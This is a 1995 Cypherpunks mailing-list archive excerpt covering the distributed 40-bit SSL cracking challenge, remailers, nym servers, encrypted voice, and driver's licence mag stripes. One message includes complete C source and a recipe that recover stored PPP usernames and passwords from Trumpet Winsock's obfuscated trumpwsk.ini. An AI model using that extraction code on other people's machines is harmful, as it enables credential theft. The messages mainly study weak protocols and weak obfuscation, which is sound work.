>> report _all_ matches in the range to the master. Slaves who
>> report a statistically low number of matches may be considered
>> suspicious. It is a simple matter to allocate part of that
>> keyspace to another processor for a double-check.
>  Please don't do anything like this.  This will prevent people
> like me who prefer the "random" method from participating.

You can't use the random method if the CRACK is using a sequential search.
It just doesn't fit !
You can't ACK something which has not been allocated to you.

However, if a CRACK were to be using random, the above would be useful as a
"progress report" as the rate of reports indicates how well the search is
going.
It would also allow more equal sharing out of the prize money, as on
average 2**15 "possible" keys would be found, and the first finder of each
would receive a fraction of the prize.


I don't know enough of the theory -- is there any limit as to how many
"partial" matches there could be in a single "segment" ?
(currently brure{ssl,rc4} stops on finding a match. They would have to keep
 going, and might have to return upto 2**16 partial results ??
)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 26 Aug 95 20:20:53 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
In-Reply-To: <199508270132.VAA05017@interport.net>
Message-ID: <9508270319.AA26098@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



> I don't get it.  If the challenge is partly secret, how will I
>know if I crack the code?

You don't thats how we make sure that you can't crack the code and not tell 
everyone else.

The servers can be validated by using a standard bit commitment type affair.

Its a matter of principle, we should ensure that the key breaking service is not 
itself subject to cryptanalytic attacks.


One small point, cryptanalysis equipment is also covered by ITAR restrictions.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Sat, 26 Aug 95 23:21:23 PDT
To: q@c2.org
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508270513.WAA26795@infinity.c2.org>
Message-ID: <199508270620.XAA16117@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Q" == Q Mixmaster Remailer <q@c2.org> writes:

    > silly@whip.ugcs.caltech.edu ((me)) wrote:
    >> California has both the digitized picture and the mag stripe,
    >> and they even get a digital copy of your thumbprint.  Hello,
    >> Brave New World.

    > I wonder what, if anything, you could be charged with if that
    > magnetic strip "accidentally" came too close to a degausser?

Not much...(!)  People who don't have the strip at all aren't breaking
any laws, and they aren't required to get strips added.  It's just
that the DMV won't give out new cards that don't have the strip.

Presumably just like the post office and zip codes: you don't *need*
it, but it speeds things up if you've got it.

- -sq


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMEAOrVIP+Y8TPTdtAQHADAQAuZUNX+cuW/nJHBSoc4KW1+C1LpJFWhUB
vXJoA7kgLuq3J38fuk/NNJ2/96z+DQdp8woJxk7PQu5LOdTRQrUajB1sxYL4vB9B
m9gELh/sdmtoSpXcraQMRCMKYnWHiBUZJzvEqBIEbBjM4Q4y4DDkHN3S+yukPTyk
AQW8vmlCEaw=
=8fIS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: White Adept <adept@minerva.cis.yale.edu>
Date: Sat, 26 Aug 95 21:14:07 PDT
To: Markku-Juhani Saarinen <marks@evitech.fi>
Subject: Re: Eudora/Trumpet encryption (stupid, solved here)
In-Reply-To: <Pine.3.89.9508191650.A25524-0100000@evitech.evitech.fi>
Message-ID: <Pine.SOL.3.91.950827001240.28053A-200000@minerva>
MIME-Version: 1.0
Content-Type: text/plain

On Sat, 19 Aug 1995, Markku-Juhani Saarinen wrote:

> 
> On Wed, 16 Aug 1995, Sean A. Walberg wrote:
> 
> > I'm a crypto newbie here, but does anybody know how Trumpet Winsock 
> > and/or Eudora encrypt the passwords in their .ini files?  I am trying to 
> > write a front end for a client and would rather it set up automatically 
> > rather than the program ask.
> > 
> 
> It's not xor. It's wrap-around addition. Not much better than rot-13 :) I 
> broke it for my friend just a couple of days back, but it seems like he 
> has deleted the source I wrote at his place (crytoanalysis and writing the 
> 4-line c-source took about 20 minutes, total). Besides the key (the one 
> used in encryption of the password) may be different in different 

four line C source?  I'm impressed.  I've enclosed a bit longer C-source 
that does the same.

> versions and licences of these programs.
> 
> Here's what you'll have to do to get the built-in key:
> 
> 1. set password to 00000000, for example, and see what it encrypts into.
> 2. now substract 0x30 (ascii 0) from every character of the encrypted 
>    password. congratulations, you have the key! :)
> 
> Now you can pretty much figure out how to decrypt any password.
> 
> Note:
> Encrypted characters are in the range 32..127. First perform a logical
> and with 0x7f. If the result is smaller than 32, add 32.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  


/*This was written to deal with trumpet winsock's 'encryption' by

  spitting out the ppp-username and ppp-password values.



  This was written by: Ben Samman <samman@cs.yale.edu>.



  The algorithm is very simple and a simple inspection of this file should

  be sufficient for most people to figure out whats going on.



  Feel free to copy this as you please, as long as you include this

  message with it.



  If you use this, please send me mail and tell me what its used

  for--I'd be somwhat curious.



  If there are any questions, feel free to mail me and ask me.



  USAGE:

  trmpbrk <base> <pass>



  Definitions:



  BASE:

  Base is a trumpwsk.ini file in which you have inputted "000000000000" into

  the ppp-username box in the File/PPP Options/Username menu in Trumpet

  Winsock.  Don't forget to rename this to something other than

  trumpwsk.ini(something like "0")



  I've included my copy of base, but every version/revision of

  Trumpet Winsock changes it, so I would recommend you do this yourself.



  PASS:

  This is the file that you want to decrypt the value for.  Most of the time

  it will be trumpwsk.ini.



  Example:



  trmpbrk 0 trumpwsk.ini



  (c)Ben Samman  <samman@cs.yale.edu>

  */

  

#include <stdio.h>

#include <stdlib.h>



void main(int argc, char **argv)

{

  int i;

  

  unsigned char line[256], username[256], username_2[256];

  FILE *BASE, *PASS;

  printf("TRMPBRK.EXE for finding PPP passwords from TRUMPWSK.INI\n");

  printf("By: Ben Samman <samman@cs.yale.edu>\n");

  printf("Copyright 1995\n");

  printf("\n\n");

  

  /*First test for number of arguments*/

  if (argc!=3)

    {

      fprintf(stderr, "Error: Too few arguments\n");

      fprintf(stderr, "Usage:\t%s <base> <password_file>\n", argv[0]);

      exit(1);

    }



  BASE=fopen(argv[1], "r");

  PASS=fopen(argv[2], "r");



  while((strncmp(fgets(line, 255, BASE), "ppp-username", 12))!=0);

  for (i=14;i<(strlen(line)-3);i++)

    {

      username[i-14]=line[i]-'0';

    }

  username[i]=0;



  while((strncmp(fgets(line, 255, PASS), "ppp-username", 12))!=0);

  for (i=14;i<(strlen(line)-3);i++)

    {

      username_2[i-14]=line[i]-username[i-14];

      username_2[i-14]=(((username_2[i-14])%128)+(96*(username_2[i-14]<32)));

    }

  

  username_2[i]=0;

  

  printf("PPP Username: %s\n", username_2);



  while((strncmp(fgets(line, 255, BASE), "ppp-password", 12))!=0);

  for (i=14;i<(strlen(line)-3);i++)

    {

      username[i-14]=line[i]-'0';

    }

  username[i]=0;



  while((strncmp(fgets(line, 255, PASS), "ppp-password", 12))!=0);

  for (i=14;i<(strlen(line)-3);i++)

    {

      username_2[i-14]=line[i]-username[i-14];

      username_2[i-14]=(((username_2[i-14])%128)+(96*(username_2[i-14]<32)));

    }

  

  username_2[i]=0;

  

  printf("PPP Password: %s\n", username_2);

}










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sat, 26 Aug 95 21:35:56 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508270432.AAA20728@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


>>   I don't get it.  If the challenge is partly secret, how
>> will I know if I crack the code?

> You don't thats how we make sure that you can't crack the code
> and not tell everyone else.

  Why would I want to do such a thing?  And if I did, why would
anyone care?

> Its a matter of principle, we should ensure that the key
> breaking service is not itself subject to cryptanalytic
> attacks.

  Absolutely.  And the simplest way to do that is to use the
random method!

>   One small point, cryptanalysis equipment is also covered by
> ITAR restrictions.

  What is the significance of this rather ominous warning?


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Q Mixmaster Remailer <q@c2.org>
Date: Sun, 27 Aug 95 01:51:02 PDT
To: mix-l@jpunix.com.cypherpunks@toad.com
Subject: Mixmaster Questions
Message-ID: <199508270823.BAA07092@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Is there an automated way I can keep my PUBRING.MIX and TYPE2.LIST
files updated automatically?  (I'd prefer to be able to "finger"
them from somewhere and redirect the results into a file.)  Also,
does anyone do a periodic "ping" of Mixmaster remailers to make sure
they're up and running?  I only run Mixmaster as a client, and not
as a remailer, and I'd like a way to make sure I don't send a
message to the bitbucket by accidentally chaining it through a
"dead" remailer.

Also, what is the latest version of Mixmaster?

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 27 Aug 95 01:38:11 PDT
To: cypherpunks@toad.com
Subject: nym server development mailing list
Message-ID: <199508270829.BAA15699@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message

To: Remailer-Operators@c2.org
From: Bryan Strawser <feanor@anduin.gondolin.org>
Subject: Nym Server Development....
Date: Fri, 11 Aug 1995 21:04:22 -0500 (EST)

John Fleming, along with a bit of support help from myself, is developing
a nym server that he is intending to release to the public once we are
satisfied with the performance and the state of the code.

At this point and time, John has pushed the code to the point where we
have am experimental nym server operating that is being constantly
refined and features added. Along the same lines, I am presently
working on solid documentation for when the nymserver is ready for
public use, and for the later public release of the code.

John created a mailing list for those interesting in contributing to the
development of his nymserver and as a forum for discussion of nymserver
related issues.  So far, there have been few folks subscribed, and no
answer from those that are presently subscribed to the list.  I find
this rather disappointing.

This is your chance to get involved in developing this server.  There has
been alot of interest expressed in nymservers on this list previously,
as well from other folks that presnetly use the type I and II remailers
that are running today.  Just like the other types of anonymity out
there, a nymserver has many viable reasons for existance.  The lack of
publically available code for such a server, as there is for remailers,
should motivate us to get behind John and his efforts.

To subscribe to the nymserver development & discussion forum, send
a message to majordomo@sephiroth.org with the line "subscribe nyms
<your name>" in the body of the message.  Questions about the
nymserver should be directed to that list so that all can be involved
in the development.

Thanks for your input,

Bryan



- -- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NCSA HTTPd <www@www.sierra.com>
Date: Sun, 27 Aug 95 02:05:30 PDT
To: cypherpunks@toad.com
Subject: Sierra On-Line Authentication Key
Message-ID: <199508270906.CAA22203@www.sierra.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome cypherpunks to SierraWeb.  We are pleased to present you with the key to our 
magical kingdom in the form of a verification key.  Your Sierra Web 
verification key is... 

humane-tomato   

Be sure and make a note of it! 
The next time you log in and are prompted for it, type in your verification key.
Remember, your verification key is not your password.  Your password is 
the word you chose when registering.

 Use the following URL to verify your membership:

 http://www.sierra.com/authenticate.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NCSA HTTPd <www@www.sierra.com>
Date: Sun, 27 Aug 95 02:05:29 PDT
To: cypherpunks@toad.com
Subject: Sierra On-Line FAQ
Message-ID: <199508270906.CAA22206@www.sierra.com>
MIME-Version: 1.0
Content-Type: text/plain


(Following is a FAQ for the SierraWeb Welcome Kit)

Welcome to SIERRAWEB

Here is some helpful information which we hope can answer a range
of  possible  questions.  At  Sierra On-line, we want to make all
your visits to our web site most enjoyable.

SIERRAWEB FAQ (Frequently Asked Questions)

Q: How do I log on to the Sierra On-line web site?

A: The SierraWeb address on the World Wide Web is

                                        http://www.sierra.com/

Since this document was most likely sent to you along  with  your
password  verification then you've already signed on to SierraWeb
once.


Q: What do I do with the verification code-words you e-mailed  to
me?

A:  Log back on to SierraWeb by typing our address  in  your  web
browser.  Then,  after  typing in your name and password, type in
the Verification Code-Word and you'll be  officially  registered.
This  is  the  only time you'll have to type in your Verification
Code unless you re-register again.

Q: Why does SierraWeb use a password and verification code-word?

A: We ask for your name and email address to confirm the  unique-
ness  of every member.  It allows us to a.) customize the service
for each individual member's preferences and b.) help  us  better
understand the demographic profile our membership and c.) prevent
abuse of the website such as unauthorized orders or  the  use  of
offensive language.  All in all, we want to get to know you as an
individual.

Q: What if I forget my password?

A: At SierraWeb, you choose your own password so we hope it  will
be  easy  to remember.  If you forget it, then you'll need to re-
register and pick a new one.

Q: How do I change the look and links of my personal User Page?

A.  Just one of the things that makes SierraWeb unique is that it
allows  you  to  change  the way you view much of the information
that is available.  Special 'looks' will change the  web  control
page  bars  at the top and bottom of the page as well as the page
background.  (Can't view backgrounds on your browser  :^(  ,  you
can still change your control bars.) For instance, you can choose
an Arcade 'look' by choosing 'Arcade' from the pop-up menu at the
bottom  right  of  your  SierraWeb  Personal Page.  If you're in-
terested in Football or  Baseball,  you  might  select  the  'Box
Seats' look. Do you like outer space and science fiction? Try out
the Space Command  look.  Here's a chart to help you  choose  the
look or looks that you might like

If you like...				You might try...

Adventure games like			Myth and Magic
King's Quest

Mother Goose or Playtoons		'Family Fun'

Comedy like Space Quest or		'Comedy'
Leisure Suit Larry or
Woodruff & the Schnibble

Children's Learning			'Kid Smarts'

Reality Role Playing			'9-1-1'

Action/Arcade				'Arcade'

Air/Sea Battle Simulations	       	'Combat'

Football/Baseball		        'Sports Fan'

Horror/Mystery/Suspense		        'Frightful'
						

...and more!  Plus you can choose from a selection of pure colored backgrounds

Q: What does the LINK change do?  A:  Along  with  changing  your
'look' on SierraWeb, you can also change your 'Link.' A 'link' is
a direct click-jump  to  a  Sierra  game  category  (also  called
genre).   There  are  a  number of categories of games at Sierra.
Here is a brief list.

ACTION
ADVENTURE
COMEDY
KIDS
EDUCATION
FAMILY
SIMULATION
SPORTS
...and more!

To create a link directly to a category, select  the  'Link'  you
want  to  jump to and click on the change button.  The new 'Link'
you select will appear in the Link window.

Q:   Back to the 'looks,' I noticed that I have a choice  between
a full page's background and a GIF tile.  What's the difference?

A: The full page background is a page  backdrop  from  an  actual
Sierra  game.  Since these files are generally around 30K in size
you'll either need to have a fast modem, say 14,400 or 28,800  or
some patience.  (They're worth waiting for!).  If you are using a
slower modem, or would like a change of  pace,  choose  the  tile
looks.   These files load much quicker since they are quite a bit
smaller in size.

Q: I can't see any backgrounds on my page.

A: Some browsers  are  not  yet  compliant  with  the  background
feature.   You  may wish to change your browser to one that meets
the HTML 2.0 standards.

Q: I can't see the whole page?

A: The standard width size for most pages on  our  website  is  9
inches  and  you should adjust the size of your browser window to
that width.

Q: I see a mailbox on my personal page and the  words  'YOU  HAVE
MAIL!'?  What is this?

A: From time to time, Sierra will be informing members with  news
about our company products and people.  If you see the words 'YOU
HAVE MAIL!,' click on the mailbox to read your mail  from  Sierra
HQ.

Q: How do I send mail to Sierra?

A: To reach Sierra On-line with a Technical Support question,  go
to  the  Help  Center  which  is  reachable by clicking the 'Help
Center' icon on the bottom control bar (the one with the  ?  Over
the  globe).   You  can also make Customer Service inquiries from
the Help Center.




Note: Some links may not be suitable for youngsters under the age
of 13 and may be automatically deactiviated.

Q: How do I use the SEARCH feature?  

A: You'll find  a  SierraWeb SEARCH  button  in  the  upper  left
hand corner of most SierraWeb pages.  Click on it and you will be
presented with a Word  Search Box ready for you to  type  in  the
word or words you are interested in locating on other pages.  For
instance, if you are  interested in  football,  Simple  type  in:
football.   If  you  are interested in Space, type in: Space.  By
typing space you might be directed  to  the  Space  Quest  series
games or to a space game like Outpost.

Q: How do I find my way back to my Personal Page?

A: Just click on the HOME button underneath the  Sierra  logo  in
the  upper  right  hand corner of most pages on SierraWeb and you
will be automatically transported  back  HOME  to  your  Personal
Page.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: White Adept <adept@minerva.cis.yale.edu>
Date: Sat, 26 Aug 95 23:18:45 PDT
To: Q Mixmaster Remailer <q@c2.org>
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508270513.WAA26795@infinity.c2.org>
Message-ID: <Pine.SOL.3.91.950827021008.2166E-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 26 Aug 1995, Q Mixmaster Remailer wrote:

> silly@whip.ugcs.caltech.edu ((me)) wrote:
> 
> > California has both the digitized picture and the mag stripe, and
> > they even get a digital copy of your thumbprint.  Hello, Brave New
> > World.
> 
> I wonder what, if anything, you could be charged with if that
> magnetic strip "accidentally" came too close to a degausser?

Why bother to degauss it--why not just let it "rest" too long on those 
demagnetizing pads they use at department stores and libraries to 
demagnetize the security strips?

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMEAMob5ALmeTVXAJAQHYcAL+JRRXuWGz3f5bxlQ3g5lExTkmPiKMYs7I
nIGxLgEXDd2+krZBa++M+6k30ZcxBhsrJamz1IzLhQ6tiXbqsOmTHtlGlBHuppi+
0pHTk/ddFuDU/gu6NXuix7f8XOTCfd4S
=YMlm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sat, 26 Aug 95 23:26:32 PDT
To: cypherpunks@toad.com
Subject: Greetings
Message-ID: <199508270626.CAA00589@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Greetings, everyone.  I just discovered this list a few days ago
and have been monitoring since then.  It's pretty interesting.
I'd like to get involved.  I'm very interested in cryptography
and mathematics, but I have very little cryptographic experience.
(hm. Is there a Cypherpunks FAQ?) From the conversation that's
going on, I am led to beleive that Cypherpunks is setting up
a distributed system to break some cryptographic system or 
factor a large number.  I would expect that a constant net
connection would be a requirement to participate in such an
interesting event.  In any case, I have a 486DX-50 running
Linux and I'm interested and curious and willing to learn
and help in any way I can.

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sat, 26 Aug 95 23:37:31 PDT
To: cypherpunks@toad.com
Subject: Demagnetizing
Message-ID: <199508270637.CAA03863@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


> demagnetizing pads they use at department stores and libraries

How exactly does that system work?  They can't instantly 
demagnetize something with a quick tap on a pad, can they? Also,
what are they demagnetizing?  Is it a strip embedded in the spine
of the book, or is it just in a sticker on the outside? For
instance, how do they do it to magazines (or do they? they
go through the process with magazines, too, or is that just
because they don't know better?)?

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sun, 27 Aug 95 00:45:12 PDT
To: cypherpunks@toad.com
Subject: Re: Demagnetizing
Message-ID: <199508270744.DAA15929@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Where exactly is the r/c circuit?  Is it very small and in
a label?  Book publishers don't put them in, do they?  
Also, if the thing gets "burned out" by the magnet in the
pad, what do libraries and such do where materials are
reused?  Just slap on another label thing?  

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Sun, 27 Aug 95 00:48:53 PDT
To: cypherpunks@toad.com
Subject: Re: Greetings
Message-ID: <199508270748.DAA16297@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Ah.  By address space, you mean a set of possible keys, right?
Is there specific software we use to test this 'address space,'
or do we come up with our own?   It seems that there ought to 
be a more exotic method other than a brute force attack.  I
don't know much about cryptography, but if there's a way to
get "feedback" as to how "close" a key is to the real key, then
some sort of genetic algorithm could be devised.  Actually, 
perhaps not, since there are no "genes" envolved, just a 
big number.  Hm.

--
=================================================================
Tobin Fricke, Alias Light Ray         dr261@cleveland.freenet.edu
TobinTech Engineering                 KE6WHF Amateur Radio
The Digital Forest BBS                (714) 586-6142, 28800bps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Man In Black <mib@davinci.netaxis.com>
Date: Sun, 27 Aug 95 01:18:55 PDT
To: Tobin T Fricke <dr261@cleveland.Freenet.Edu>
Subject: Re: Demagnetizing
In-Reply-To: <199508270637.CAA03863@kanga.INS.CWRU.Edu>
Message-ID: <Pine.SOL.3.91.950827041448.24279A-100000@davinci.netaxis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Aug 1995, Tobin T Fricke wrote:

> How exactly does that system work?  They can't instantly 
> demagnetize something with a quick tap on a pad, can they? Also,
> what are they demagnetizing?  Is it a strip embedded in the spine
> of the book, or is it just in a sticker on the outside? For
> instance, how do they do it to magazines (or do they? they
> go through the process with magazines, too, or is that just
> because they don't know better?)?

The way the system works at my local library is that there _is_ a strip 
embedded in the spine and it isn't demagnetized by a quick tap by rubbing 
it several times over a demagnetizer (there's a big sticker on the side 
that says not to leave any magnetic storage media near it).   As far as 
magazines go, my library simply doesn't let people borrow them (which 
means if it ain't there, it's stolen).  Anyone know how they protect 
against magazine theft (okay, no crypto relevance.  reply to me and not 
the list, then).  Later.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
Comment: There is no such thing as electronic privacy.

mQCNAzA9lawAAAEEAMYfSOuOc2Han9mukOOf1JPVQnke79fMxSiwbq25IKAAgIUP
x6ICYwsm8s2l1vjoBgPHcVIyoJ1mlA8s1X05oSnO6skwhtASMS7CNY/m+b7gG1XH
uZkwSXkwP5ZZXOaYkVHaImKKVXCk3VoPax7l4V5JsfLuiRuP6PCnxsH0qebZAAUR
tB5NYW4gSW4gQmxhY2sgPG1pYkBuZXRheGlzLmNvbT4=
=BJS/
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sat, 26 Aug 95 18:21:39 PDT
To: rjc@clark.net
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508262330.TAA08738@clark.net>
Message-ID: <199508270121.EAA24196@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


>   It's really great that there are all these voice transmission/encryption
> programs out there, the problem is, none of them will talk to each other.

Maybe someone could start writing an internet draft about "encrypted
voice transmission on the internet".  It should address several
issues:
  - compression methods, sampling rate differencies, encoding methods
  - encryption methods used for bulk data: at least IDEA, 3DES, DES
    (3DES and DES required, IDEA optional but recommended (for patent reasons))
  - key exchange and authentication methods.  One good model could be
    that used in Photuris (see the internet draft
    draft-ietf-ipsec-photuris-02.txt at e.g. www.ietf.cnri.reston.va.us).
    Photuris is essentially Diffie-Hellman followed by authenticating
    the other party via signing the exchange.  (Authentication is
    important to avoid man-in-the-middle attacks).
  - specification of the protocol for modem-to-modem connections

Provided that the compression method is patent-free, all of the
related crypto patents expire within about two years (assuming
something other than RSA can be used for the signatures - see the
Photurs draft).  (IDEA should be optional because its patent will not
expire in near future).

I think it would be a good idea to set up a mailing list for this.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 27 Aug 95 04:25:08 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: proliferation of voicesystems
In-Reply-To: <199508270121.EAA24196@shadows.cs.hut.fi>
Message-ID: <199508271034.GAA20541@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tatu Ylonen writes:
> >   It's really great that there are all these voice transmission/encryption
> > programs out there, the problem is, none of them will talk to each other.
> 
> Maybe someone could start writing an internet draft about "encrypted
> voice transmission on the internet".

Well, we already have standards for how to send audio in general over
the internet (the RTP standards that are used in the MBONE among other
places.) Presumably if you take IPSEC and cross it with RTP...

The real issue to me is setting such things up so that they work
nicely even on point to point modem connections without too much
protocol overhead.

> I think it would be a good idea to set up a mailing list for this.

Probably...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 27 Aug 95 00:41:51 PDT
To: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Subject: Re: Greetings
In-Reply-To: <199508270626.CAA00589@kanga.INS.CWRU.Edu>
Message-ID: <"swan.cl.cam.:183500:950827074128"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> going on, I am led to beleive that Cypherpunks is setting up
> a distributed system to break some cryptographic system or 
> factor a large number.

See http://www.brute.cl.cam.ac.uk/brute/

We are trying to show that the US Govt' crippling iof exportable "secure"
protocols to 40 bits leaves them open to CRACKing by others than the NSA.

> I would expect that a constant net connection would be a requirement to
> participate in such an interesting event.

No -- that is the preferred way, but you can use a network connection
(WWW or direct socket) to get part of the address space to search,
process it offline, and then report back your findings later.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Sun, 27 Aug 95 01:39:50 PDT
To: wfrench@interport.net
Subject: SSL trouble
In-Reply-To: <199508262332.TAA26817@interport.net>
Message-ID: <9584.199508270839@olib>
MIME-Version: 1.0
Content-Type: text/plain



Will French <wfrench@interport.net> writes:
>   Well, if someone starts talking real money, I might change my
> tune.

We are talking real money, the guy who hit the key will shortly be
getting c$ 442.30 (DigiCash c$), the amount of c$ donated for the 2nd
challenge on this page:

	http://dcs.ex.ac.uk/~aba/sslprize.html

Now collecting donations for the 3rd challenge which I guess Piete
will be hoping to do in the next few weeks, after a few software
improvements have been made.

You can buy US$ with these on the unofficial digicash exchange:

	http://www.c2.org/~mark/ecash/ecash.html

The current exchange rate is around 100 c$ = 5 US$, so that's ~22 US$,
not a huge prize, but all it needs is more donors to get a bigger
prize fund, if you want to join in to make the prize fund bigger, sign
up for the digicash trial (you get 100 c$ free):

	http://www.digicash.com/ecash/

and buy some c$ on the unofficial exchange.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sun, 27 Aug 95 11:48:30 PDT
To: Damien.Doligez@inria.fr (Damien Doligez)
Subject: Re: SSL trouble
In-Reply-To: <9508261034.AA15406@couchey.inria.fr>
Message-ID: <199508271848.LAA18104@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Let us call "sequential search" an algorithm that remembers which keys were
| tried and avoids trying them again, and "random search" an algorithm that
| just tries keys at random without bothering to check.
|  
| The sequential search has the following problems:
|  
| 1. The server is badly overloaded.
| It is vulnerable to a variety of active attacks:
| 2. "result hoarding" attacks: finding the result and reporting it "not foun
d".
| 3. "dilution" attack: allocating some search space and not sweeping it.
| 4. plain old "denial of service" attack: deliberately overloading the serve
r
|    with bogus communications.
| 5. And of course all of the above in their "buggy software or hardware"
|    versions.

And there is the third alternative, hierarchical search, which
distributes the task of giving out keys. This is admittedly a
little bit more involved, of course. The SKSP had provisions for
doing it hierarchically, as far as I understood it, although
I might be wrong.

What I wonder is wheter the server congestion really showed that
the protocol is flawed. Handing out bigger blocks relieved the 
situation. I think this can be further improved if you do a couple 
more things.

1. The server knows approximately how many requests per second it 
can take, and tells the clients this information.

2. The client initially does a testrun, and determines how fast it 
runs.

3. Each client is handed a block that, given the approximate number
of currently pending and active blocks out there, together with the
calculation time of the client, will give an acceptable number of 
requests/time unit to the server.

4. The server acks (S-ACK) the block-ack to the client. If the client 
doesn't get an ack (S-ACK) from the server for its ack (B-ACK), it 
keeps the ack around til the next block is calculated, and sends this 
ack together with the new acks.

5. The server can hand out allocated blocks to others, for those
blocks that has not been acked in three times the estimated
calculation time. 

6. If a client is unable to get a key allocation after a number of 
tries, it can chose a random block and search that. It can then be
acked to the server. This may result in overlapping blocks, but this
should not pose such a big problem, since most of the key space is
searched in an orderly manner anyway.

It would be very interesting if detailed statistics or the logfile
of the server could be published somewhere. How many machines were
involved? etc...

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 27 Aug 95 13:18:29 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
Message-ID: <199508272017.NAA06661@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


White Adept wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> On Sat, 26 Aug 1995, Q Mixmaster Remailer wrote:


> > silly@whip.ugcs.caltech.edu ((me)) wrote:

> > > California has both the digitized picture and the mag stripe, and
> > > they even get a digital copy of your thumbprint.  Hello, Brave New

> > > World.
> > I wonder what, if anything, you could be charged with if that
> > magnetic strip "accidentally" came too close to a degausser?

> Why bother to degauss it--why not just let it "rest" too long on those 
> demagnetizing pads they use at department stores and libraries to 
